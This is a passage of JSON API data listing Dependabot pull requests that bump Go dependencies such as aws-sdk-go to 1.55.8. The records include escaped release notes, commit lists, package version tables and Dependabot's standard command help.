behavior\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/a3ca2ca026268dc6acfc60a2e8393b33b428c507\"\u003e\u003ccode\u003ea3ca2ca\u003c/code\u003e\u003c/a\u003e v1.38.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/4dada364c7635fffe6b8a6b45a7588dabd64cdf4\"\u003e\u003ccode\u003e4dada36\u003c/code\u003e\u003c/a\u003e fix failing have http tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/d40c6917ce1a2c9299bda4b900b59d80bdefc689\"\u003e\u003ccode\u003ed40c691\u003c/code\u003e\u003c/a\u003e make string formatitng more consistent for users who use format.Object directly\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/2a37b463cac790e945d16f52c1c13a4e835511a1\"\u003e\u003ccode\u003e2a37b46\u003c/code\u003e\u003c/a\u003e doc: fix typos\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/ee26170d3a0a21d5702f4164df42eb99c50221d7\"\u003e\u003ccode\u003eee26170\u003c/code\u003e\u003c/a\u003e docs: fix HaveValue example\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/onsi...\n\n_Description has been truncated_","html_url":"https://github.com/aws/eks-anywhere/pull/10744","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/aws%2Feks-anywhere/issues/10744","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/10744/packages"},{"uuid":"4246340042","node_id":"PR_kwDOGYRM8c7RuZhJ","number":6,"state":"closed","title":"Bump github.com/aws/aws-sdk-go from 1.45.15 to 1.55.8 in the go-dependencies group","user":"dependabot[bot]","labels":["dependencies","go"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-04-12T07:11:25.000Z","author_association":null,"state_reason":null,"created_at":"2026-04-12T03:01:24.000Z","updated_at":"2026-04-12T07:11:26.000Z","time_to_close":15001,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","packages":[{"name":"github.com/aws/aws-sdk-go","old_version":"1.45.15","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"}],"path":"the go-dependencies group","ecosystem":"go"},"body":"Bumps the go-dependencies group with 1 update: [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go).\n\nUpdates `github.com/aws/aws-sdk-go` from 1.45.15 to 1.55.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.7 (2025-04-22)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/s3/s3manager\u003c/code\u003e: Abort multipart download if object is modified during download\n\u003cul\u003e\n\u003cli\u003eFixes \u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/4986\"\u003e4986\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.6 (2025-01-15)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix broken printf for go1.24\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.5 (2024-07-30)\u003c/h1\u003e\n\u003ch3\u003eService Client Updates\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/appstream\u003c/code\u003e: Updates service API and documentation\n\u003cul\u003e\n\u003cli\u003eAdded support for Red Hat Enterprise Linux 8 on Amazon AppStream 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/autoscaling\u003c/code\u003e: Updates service API and documentation\n\u003cul\u003e\n\u003cli\u003eIncrease the length limit for VPCZoneIdentifier from 2047 to 5000\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/codepipeline\u003c/code\u003e: Updates service API, documentation, and paginators\n\u003cul\u003e\n\u003cli\u003eAWS CodePipeline V2 type pipelines now support stage level conditions to enable development teams to safely release changes that meet quality and compliance requirements.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticache\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eDoc only update for changes to deletion API.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticloadbalancing\u003c/code\u003e: Updates service API\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/eventbridge\u003c/code\u003e: Updates service API\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/logs\u003c/code\u003e: Updates service API\n\u003cul\u003e\n\u003cli\u003eAdd v2 smoke tests and smithy smokeTests trait for SDK testing.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/models.lex.v2\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/rolesanywhere\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/tnb\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/workspaces\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eRemoving multi-session as it isn't supported for pools\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.4 (2024-07-29)\u003c/h1\u003e\n\u003ch3\u003eService Client Updates\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticache\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eRenaming full service name as it appears in developer documentation.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/memorydb\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/163aada692ed32951f979aacf452ded4c03b8a7c\"\u003e\u003ccode\u003e163aada\u003c/code\u003e\u003c/a\u003e release v1.55.7 (2025-04-22) (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/5346\"\u003e#5346\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/9eb2bfd2f949fc81b96cee6b5aae6d9b84abea75\"\u003e\u003ccode\u003e9eb2bfd\u003c/code\u003e\u003c/a\u003e Abort multi part download if the object is modified during download\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/8d203ccff393340d080be0417d091cc60354449b\"\u003e\u003ccode\u003e8d203cc\u003c/code\u003e\u003c/a\u003e Update bug-report.yml\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.45.15...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\n[![Dependabot compatibility score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=github.com/aws/aws-sdk-go\u0026package-manager=go_modules\u0026previous-version=1.45.15\u0026new-version=1.55.8)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\n\n\n\u003c/details\u003e","html_url":"https://github.com/mojatter/s3fs/pull/6","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/mojatter%2Fs3fs/issues/6","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/6/packages"},{"uuid":"4216077404","node_id":"PR_kwDOR7zCgs7QaTaM","number":24,"state":"open","title":"Bump github.com/aws/aws-sdk-go from 1.55.7 to 1.55.8 in /pkg/build","user":"dependabot[bot]","labels":["dependencies","go"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-04-07T07:11:37.000Z","updated_at":"2026-04-07T07:11:45.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","packages":[{"name":"github.com/aws/aws-sdk-go","old_version":"1.55.7","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"}],"path":"/pkg/build","ecosystem":"go"},"body":"Bumps [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) from 1.55.7 to 1.55.8.\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.55.7...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\n[![Dependabot compatibility score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=github.com/aws/aws-sdk-go\u0026package-manager=go_modules\u0026previous-version=1.55.7\u0026new-version=1.55.8)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)\n\n\n\u003c/details\u003e","html_url":"https://github.com/LX-CodeReview/grafana__grafana__codehawk__PR107534__20260407/pull/24","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/LX-CodeReview%2Fgrafana__grafana__codehawk__PR107534__20260407/issues/24","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/24/packages"},{"uuid":"4215973674","node_id":"PR_kwDOR7zCgs7QZ--6","number":13,"state":"open","title":"Bump github.com/aws/aws-sdk-go from 1.55.7 to 1.55.8","user":"dependabot[bot]","labels":["dependencies","go"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-04-07T06:47:49.000Z","updated_at":"2026-04-07T06:47:56.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","packages":[{"name":"github.com/aws/aws-sdk-go","old_version":"1.55.7","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"}],"path":null,"ecosystem":"go"},"body":"Bumps [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) from 1.55.7 to 1.55.8.\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.55.7...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\n[![Dependabot compatibility score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=github.com/aws/aws-sdk-go\u0026package-manager=go_modules\u0026previous-version=1.55.7\u0026new-version=1.55.8)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)\n\n\n\u003c/details\u003e","html_url":"https://github.com/LX-CodeReview/grafana__grafana__codehawk__PR107534__20260407/pull/13","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/LX-CodeReview%2Fgrafana__grafana__codehawk__PR107534__20260407/issues/13","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/13/packages"},{"uuid":"4214487064","node_id":"PR_kwDOCdvj-c7QVocv","number":7880,"state":"closed","title":"dev: bump the safe group across 1 directory with 42 updates","user":"dependabot[bot]","labels":["dependencies","go"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-04-20T23:57:22.000Z","author_association":null,"state_reason":null,"created_at":"2026-04-06T22:59:49.000Z","updated_at":"2026-04-20T23:57:24.000Z","time_to_close":1213053,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"dev: bump","group_name":"safe","update_count":42,"packages":[{"name":"github.com/KimMachineGun/automemlimit","old_version":"0.7.4","new_version":"0.7.5","repository_url":"https://github.com/KimMachineGun/automemlimit"},{"name":"github.com/aws/aws-sdk-go","old_version":"1.55.7","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"},{"name":"github.com/aws/aws-sdk-go-v2/config","old_version":"1.29.12","new_version":"1.32.14","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/s3","old_version":"1.78.2","new_version":"1.98.0","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/coder/websocket","old_version":"1.8.13","new_version":"1.8.14","repository_url":"https://github.com/coder/websocket"},{"name":"github.com/eclipse/paho.mqtt.golang","old_version":"1.5.0","new_version":"1.5.1","repository_url":"https://github.com/eclipse/paho.mqtt.golang"},{"name":"github.com/emersion/go-smtp","old_version":"0.22.0","new_version":"0.24.0","repository_url":"https://github.com/emersion/go-smtp"},{"name":"github.com/envoyproxy/protoc-gen-validate","old_version":"1.2.1","new_version":"1.3.3","repository_url":"https://github.com/envoyproxy/protoc-gen-validate"},{"name":"github.com/getsentry/sentry-go","old_version":"0.34.1","new_version":"0.44.1","repository_url":"https://github.com/getsentry/sentry-go"},{"name":"github.com/jackc/pgx/v5","old_version":"5.7.5","new_version":"5.9.1","repository_url":"https://github.com/jackc/pgx"},{"name":"github.com/jarcoal/httpmock","old_version":"1.4.0","new_version":"1.4.1","repository_url":"https://github.com/jarcoal/httpmock"},{"name":"github.com/klauspost/compress","old_version":"1.18.0","new_version":"1.18.5","repository_url":"https://github.com/klauspost/compress"},{"name":"github.com/lib/pq","old_version":"1.10.9","new_version":"1.12.3","repository_url":"https://github.com/lib/pq"},{"name":"github.com/nats-io/nats-server/v2","old_version":"2.11.4","new_version":"2.12.6","repository_url":"https://github.com/nats-io/nats-server"},{"name":"github.com/prometheus/client_golang","old_version":"1.22.0","new_version":"1.23.2","repository_url":"https://github.com/prometheus/client_golang"},{"name":"github.com/redis/go-redis/v9","old_version":"9.11.0","new_version":"9.18.0","repository_url":"https://github.com/redis/go-redis"},{"name":"github.com/spf13/cast","old_version":"1.9.2","new_version":"1.10.0","repository_url":"https://github.com/spf13/cast"},{"name":"github.com/spf13/cobra","old_version":"1.9.1","new_version":"1.10.2","repository_url":"https://github.com/spf13/cobra"},{"name":"github.com/spf13/viper","old_version":"1.20.1","new_version":"1.21.0","repository_url":"https://github.com/spf13/viper"},{"name":"github.com/throttled/throttled/v2","old_version":"2.13.0","new_version":"2.15.0","repository_url":"https://github.com/throttled/throttled"},{"name":"github.com/uptrace/bun","old_version":"1.2.14","new_version":"1.2.18","repository_url":"https://github.com/uptrace/bun"},{"name":"github.com/uptrace/bun/dialect/pgdialect","old_version":"1.2.14","new_version":"1.2.18","repository_url":"https://github.com/uptrace/bun"},{"name":"github.com/uptrace/bun/driver/pgdriver","old_version":"1.2.14","new_version":"1.2.18","repository_url":"https://github.com/uptrace/bun"},{"name":"go.opentelemetry.io/contrib/instrumentation/github.com/gorilla/mux/otelmux","old_version":"0.62.0","new_version":"0.67.0","repository_url":"https://github.com/open-telemetry/opentelemetry-go-contrib"},{"name":"go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc","old_version":"0.62.0","new_version":"0.67.0","repository_url":"https://github.com/open-telemetry/opentelemetry-go-contrib"},{"name":"go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp","old_version":"0.62.0","new_version":"0.67.0","repository_url":"https://github.com/open-telemetry/opentelemetry-go-contrib"},{"name":"go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracegrpc","old_version":"1.37.0","new_version":"1.43.0","repository_url":"https://github.com/open-telemetry/opentelemetry-go"},{"name":"go.thethings.network/lorawan-stack-legacy/v2","old_version":"2.1.0","new_version":"2.1.1","repository_url":"https://github.com/TheThingsNetwork/lorawan-stack"},{"name":"go.uber.org/zap","old_version":"1.27.0","new_version":"1.27.1","repository_url":"https://github.com/uber-go/zap"},{"name":"golang.org/x/oauth2","old_version":"0.35.0","new_version":"0.36.0","repository_url":"https://github.com/golang/oauth2"}],"path":null,"ecosystem":"go"},"body":"Bumps the safe group with 30 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/KimMachineGun/automemlimit](https://github.com/KimMachineGun/automemlimit) | `0.7.4` | `0.7.5` |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.55.7` | `1.55.8` |\n| [github.com/aws/aws-sdk-go-v2/config](https://github.com/aws/aws-sdk-go-v2) | `1.29.12` | `1.32.14` |\n| [github.com/aws/aws-sdk-go-v2/service/s3](https://github.com/aws/aws-sdk-go-v2) | `1.78.2` | `1.98.0` |\n| [github.com/coder/websocket](https://github.com/coder/websocket) | `1.8.13` | `1.8.14` |\n| [github.com/eclipse/paho.mqtt.golang](https://github.com/eclipse/paho.mqtt.golang) | `1.5.0` | `1.5.1` |\n| [github.com/emersion/go-smtp](https://github.com/emersion/go-smtp) | `0.22.0` | `0.24.0` |\n| [github.com/envoyproxy/protoc-gen-validate](https://github.com/envoyproxy/protoc-gen-validate) | `1.2.1` | `1.3.3` |\n| [github.com/getsentry/sentry-go](https://github.com/getsentry/sentry-go) | `0.34.1` | `0.44.1` |\n| [github.com/jackc/pgx/v5](https://github.com/jackc/pgx) | `5.7.5` | `5.9.1` |\n| [github.com/jarcoal/httpmock](https://github.com/jarcoal/httpmock) | `1.4.0` | `1.4.1` |\n| [github.com/klauspost/compress](https://github.com/klauspost/compress) | `1.18.0` | `1.18.5` |\n| [github.com/lib/pq](https://github.com/lib/pq) | `1.10.9` | `1.12.3` |\n| [github.com/nats-io/nats-server/v2](https://github.com/nats-io/nats-server) | `2.11.4` | `2.12.6` |\n| [github.com/prometheus/client_golang](https://github.com/prometheus/client_golang) | `1.22.0` | `1.23.2` |\n| [github.com/redis/go-redis/v9](https://github.com/redis/go-redis) | `9.11.0` | `9.18.0` |\n| [github.com/spf13/cast](https://github.com/spf13/cast) | `1.9.2` | `1.10.0` |\n| [github.com/spf13/cobra](https://github.com/spf13/cobra) | `1.9.1` | `1.10.2` |\n| [github.com/spf13/viper](https://github.com/spf13/viper) | `1.20.1` | `1.21.0` |\n| [github.com/throttled/throttled/v2](https://github.com/throttled/throttled) | `2.13.0` | `2.15.0` |\n| [github.com/uptrace/bun](https://github.com/uptrace/bun) | `1.2.14` | `1.2.18` |\n| [github.com/uptrace/bun/dialect/pgdialect](https://github.com/uptrace/bun) | `1.2.14` | `1.2.18` |\n| 